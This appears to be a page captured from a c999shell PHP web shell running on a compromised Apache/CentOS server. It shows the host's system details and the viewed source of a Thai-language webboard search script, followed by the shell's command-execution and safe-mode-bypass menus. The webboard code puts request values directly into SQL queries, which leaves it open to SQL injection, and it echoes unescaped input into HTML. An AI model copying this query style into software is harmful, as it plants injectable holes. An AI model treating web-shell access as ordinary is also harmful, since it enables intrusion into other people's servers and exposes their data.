Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/webboard/ drwxr-xr-x | |
| Viewing file: Select action/file-type: <?
include("config.inc.php");
include("header.php");
if($online>=1){
include("useronline.php");
}
include("function.php");
if(empty($Category)){
echo "<center><br>";
echo "<font color=red size=+1> กรุณาระบุ Category ให้ตรงกับที่ web เปิดใช้ด้วยครับ</font>";
echo "<br><br>";
echo "<font color=red size=+1><b>[</b> <a href='javascript:history.back(1)'>กลับไปแก้ไข</a> <b>]</b></font>";
echo "</center>";
exit();
}
else {
$Category = CheckCategory($Category);
}
?>
<html>
<head>
<title><?echo $title?></title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor=#FFFFE0 background="pic/bg2.gif" onmouseover="window.status=' <?echo $title?> '; return true";
onmouseout="window.status=' <?echo $title?> '; return true";>
<p> <?
?>
<form method=post action="../webboard/search.php?Category=<? echo $Category; ?>" name="SearchForm" onSubmit="return check()">
<table width=809 height="37" border=0 align="center">
<tr>
<td align=center width="44%" height="33"> <div align="center"><br>
<?
echo "สมาชิก 3 คนล่าสุด : ";
include("nuser.php");
echo "<br>";
echo " มี ";
include("alluser.php");
?>
<?
//echo "Happy Birth Day to : ";
include("bd.php");
?>
</div></td>
<td align=center width="56%" height="33">ค้นหาคำถาม
<input type=text name="search" size=25 maxlength=100>
<input type=submit value="Search">
</td></tr></table>
</form>
<?
include("config.inc.php");
$search_topic = $search;
$search = strtolower(trim($search));
$chk_date = date("j M Y",mktime( date("H")+$p_hour, date("i")+$p_min ));
if (empty($page)){
$page=1;
}
// ติดต่อ database เพื่ออ่านข้อมูล
// หาจำนวนหน้าทั้งหมด
mysql_connect($host,$user,$passwd);
$sql = "select No from webboard_data where Category='$Category' and Question like '%$search%' or Note like '%$search%'";
$result = mysql_db_query($dbname,$sql);
$NRow = mysql_num_rows($result);
$rt = $NRow%$list_page;
if($rt!=0) {
$totalpage = floor($NRow/$list_page)+1;
}
else {
$totalpage = floor($NRow/$list_page);
}
$goto = ($page-1)*$list_page;
echo "<font size=3 face='MS Sans Serif'>\n";
echo " ผลจากการค้นหาคำว่า \" <font color=red><b>$search_topic </b></font>\" เจอทั้งหมดจำนวน \" <font color=red><b>$NRow</b> </font>\" คำถาม\n";
echo "</font><br><br>\n\n";
// Query ข้อมูลตามจำนวนที่กำหนด
$sql = "select * from webboard_data where Category='$Category' and Question like '%$search%' or Note like '%$search%' order by No DESC limit $goto,$list_page";
$result = mysql_db_query($dbname,$sql);
$NRow = mysql_num_rows($result);
if($NRow==0) {
echo "<hr color=1E90FF>\n";
echo "</center>\n";
echo "</body>\n";
echo "</html>\n";
exit();
}
// แสดงหัวข้อของบอร์ด
else {
echo "<table width=809 height=36 border=1 bordercolor=black cellspacing=0 cellpadding=2>\n";
echo "<tr bgcolor= dodgerblue>\n";
echo "\t<td align=center width=11%><font size=2 color=#FFF8DC><b>คำถามที่</b></font></td>\n";
echo "\t<td align=center width=47% ><font size=2 color=#FFF8DC><b>คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]</b></font></td>\n";
echo "\t<td align=center width=24%><font size=2 color=#FFF8DC><b>ผู้ถาม[วันที่ถาม]</b></font></td>\n";
echo "\t<td align=center width=18%><font size=2 color=#FFF8DC><b>ผู้ตอบ[วันที่ตอบ]</b></font></td>\n";
echo "</tr>\n\n";
// วนลูปแสดงข้อมูลที่อ่านได้
while ($row = mysql_fetch_array($result)) {
// กำหนดสีของตาราง เพื่อให้มีการสลับสี
//$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";
$bgc = ($bgc==$rowColor1) ? $rowColor2 : $rowColor1;
// กำหนดค่าตัวแปร
$No = sprintf("%05d",$row["No"]);
$Question = $row["Question"];
$Name = $row["Name"];
$Namer = $row["Namer"];
$Member = $row["Member"];
$Memberr = $row["Memberr"];
$nphoto = $row["nphoto"];
$Date = trim(substr($row["Date"],-19,-9)); // แสดงเฉพาะวันที่
$Reply = $row["Reply"];
$ReplyDate = trim(substr($row["ReplyDate"],-19,-9));
$pageviewdata = $row["pageview"];
// แสดงเฉพาะวันที่
if($Date==$chk_date) {
echo "<tr bgcolor=$rowHiLight>\n";
}else {
echo "<tr bgcolor=$bgc>\n";
}
// แสดงรูป folder
////new
if($Reply>="10" )
{
echo "\t<td align=center><img src='../webboard/pic/hotfd.gif'> $No</td>\n";
}
elseif($ReplyDate!="")
{
echo "\t<td align=center><img src='../webboard/pic/openfd.gif'> $No</td>\n";
}
elseif($Date==$chk_date)
{
echo "\t<td align=center><img src='../webboard/pic/newfd.gif'> $No</td>\n";
}
else {
echo "\t<td align=center><img src='../webboard/pic/closefd.gif'> $No</td>\n";
}
if(($ReplyDate==$chk_date)&&($nphoto!='')&&($Date==$chk_date)) {
echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif(($ReplyDate==$chk_date)&&($nphoto!='')) {
echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif(($ReplyDate==$chk_date) &&($Date==$chk_date))
{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif($ReplyDate==$chk_date)
{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif(($nphoto!='') &&($Date==$chk_date))
{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\"> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif($nphoto!='')
{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\"> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
elseif($Date==$chk_date)
{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\"> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
else{
echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> [<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
}
if($Member) {
echo "\t<td>$Name <img src='../webboard/pic/online.gif'> <font color=blue> [$Date]</font></td>\n";
}
else {
echo "\t<td>$Name <font color=blue> [$Date] </font></td>\n";
}
// ตรวจสอบว่ามีคนตอบคำถามหรือยัง
if($Memberr) {
if($ReplyDate!="" )
{
echo "\t<td>$Namer <img src='../webboard/pic/online.gif'> <font color=blue>[$ReplyDate]</font></td>\n";
}
else
{
echo "\t<td> ยังไม่มีคนตอบ </td>\n";
}
echo "</tr>\n\n";
}else{
if($ReplyDate!="" )
{
echo "\t<td> $Namer <font color=blue>[$ReplyDate]</font></td>\n";
}
else
{
echo "\t<td> ยังไม่มีคนตอบ </td>\n";
}
echo "</tr>\n\n";
}
}
echo "</table>\n\n";
// table อธิบายความหมายของรูป
echo "<table width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
echo "<tr><td align=left>\n";
echo "\t<img src='../webboard/pic/newfd.gif'> - คำถามใหม่ \n";
echo "\t<img src='../webboard/pic/closefd.gif'> - คำถามเก่า \n";
echo "\t<img src='../webboard/pic/openfd.gif'> - คำถามที่ถูกตอบแล้ว\n";
echo "\t<img src='../webboard/pic/hotfd.gif'> - คำถามที่มีคนตอบมาก\n";
echo "\t<img src='../webboard/pic/cam.gif'> - คำถามที่มีรูป\n";
echo "\t<img src='../webboard/pic/online.gif'> - สมาชิกเว็บบอร์ด\n";
echo "</td></tr>\n";
echo "</table>\n\n";
// table แสดงเลขหน้า
echo "<table width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
echo "<tr><td align=left>\n";
echo "\t<font size=2 color=#9400D3>\n";
// สร้าง link เพื่อไปหน้าก่อน-หน้าถัดไป
if($page>1 && $page<=$totalpage) {
$prevpage = $page-1;
echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$prevpage'>[หน้าก่อน = $prevpage]</a>\n";
}
echo "\t กำลังแสดงหน้าที่ $page/$totalpage \n";
if($page!=$totalpage) {
$nextpage = $page+1;
echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$nextpage'>[หน้าถัดไป = $nextpage]</a>\n";
}
echo "\t</font>\n";
echo "</td></tr>\n";
echo "<tr><td>\n";
// วนลูปแสดงเลขหน้าทั้งหมด
for($i=1 ; $i<$page ; $i++) {
echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";
}
echo "\t<font size=2 color=red><b>$page</b></font> \n";
for($i=$page+1 ; $i<=$totalpage ; $i++) {
echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";
}
echo "</td></tr>\n";
echo "</table>\n";
}
?>
<font size=2 face="MS Sans Serif"> [ <a href="../webboard/postq.php?Category=<? echo $Category; ?>&page=<? echo $page; ?>">ตั้งคำถามใหม่</a>
] </font>
<hr width="809" color=1E90FF>
<font size=1 face="MS Sans Serif"> </font> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]-- |